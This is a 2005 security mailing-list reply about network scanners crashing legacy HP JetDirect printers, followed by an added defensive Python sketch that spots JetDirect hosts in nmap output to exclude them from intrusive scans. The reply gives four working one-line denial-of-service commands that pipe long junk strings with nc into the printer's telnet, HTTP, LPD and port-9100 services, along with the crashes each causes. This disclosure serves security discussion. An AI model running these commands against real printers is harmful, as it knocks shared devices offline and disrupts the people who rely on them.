From: Marco Ivaldi (raptor@0xdeadbeef.info)
Date: Fri Dec 02 2005 - 13:50:41 EST
> One other thing I've seen with nCircle (& a few other scanners), if you
> run internally & have any legacy HP jetdirect printers located on your
> network, you may want to check with nCircle to see if their scans still
> lock up those printers.
Actually, it's usually fairly easy to DoS printers, especially if they are
using an old firmware release. Here are a few ways to reproduce some HP
JetDirect vulnerabilities (tested on J3111A, firmware version G.05.35 --
it's quite old, I didn't bother to test newer releases):
root@charon:~# nmap -A x.x.x.x
Interesting ports on printer.mediaservice.pri (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
23/tcp open telnet HP JetDirect printer telnetd
80/tcp open http?
515/tcp open printer?
9100/tcp open jetdirect?
Device type: printer|print server
Running: HP embedded
OS details: HP printer w/JetDirect card
1) TELNET. Crash all network services:
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23
2) HTTP. Crash all network services with funny stack dump on paper:
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80
3) PRINTER. The printer switches indefinitely between data recv and ready:
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515
4) JETDIRECT. Prints ABCD... and leaves the printer in "unstable" status:
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100
Pretty lame, isn't it? In case someone's interested I've scanned the funny
stack dump printed on paper and put it on-line here:
http://www.0xdeadbeef.info/stuff/hp-crash.jpg
Sincerely,
--
Marco Ivaldi
Antifork Research, Inc.
http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707
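
Added example, not part of the original post: since the thread is about scans locking up legacy JetDirect printers, this sketch picks JetDirect devices out of nmap output like the listing above so they can be kept out of intrusive scan profiles. The sample output, addresses and function name are constructed for illustration.

```python
import re

# Ports the post exercises on the JetDirect card.
FRAGILE_PORTS = {23, 80, 515, 9100}
# Host header in older ("Interesting ports on") and newer ("Nmap scan report for") output.
HOST_RE = re.compile(
    r"^(?:Interesting ports on|Nmap scan report for)\s+(?:(\S+)\s+\()?([0-9.]+)\)?:?$")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s*(.*)$")

# Constructed sample (documentation addresses), modelled on the output in the post.
SAMPLE = """\
Interesting ports on printer.example.test (192.0.2.10):
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     HP JetDirect printer telnetd
80/tcp   open  http?
515/tcp  open  printer?
9100/tcp open  jetdirect?
OS details: HP printer w/JetDirect card
Interesting ports on 192.0.2.20:
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.2 (protocol 2.0)
9100/tcp open  jetdirect?
"""

def find_jetdirect_hosts(nmap_text):
    """Map IP -> sorted open fragile ports, for hosts fingerprinted as JetDirect."""
    hosts, current = {}, None
    for raw in nmap_text.splitlines():
        line = raw.strip()
        host = HOST_RE.match(line)
        if host:
            current = hosts.setdefault(host.group(2), {"ports": set(), "hit": False})
            continue
        if current is None:
            continue
        port = PORT_RE.match(line)
        # "jetdirect?" in the SERVICE column is only a port-number guess, so for
        # port lines look at the VERSION text; other lines (OS details) count whole.
        evidence = port.group(2) if port else line
        if "jetdirect" in evidence.lower():
            current["hit"] = True
        if port and int(port.group(1)) in FRAGILE_PORTS:
            current["ports"].add(int(port.group(1)))
    return {ip: sorted(h["ports"]) for ip, h in hosts.items() if h["hit"]}

if __name__ == "__main__":
    for ip, ports in find_jetdirect_hosts(SAMPLE).items():
        print(f"{ip}  # JetDirect, open: {ports} -> exclude from intrusive profiles")
```

The second sample host has 9100/tcp open but no JetDirect fingerprint, so it is not listed; nmap's "jetdirect?" label alone is only a guess based on the port number.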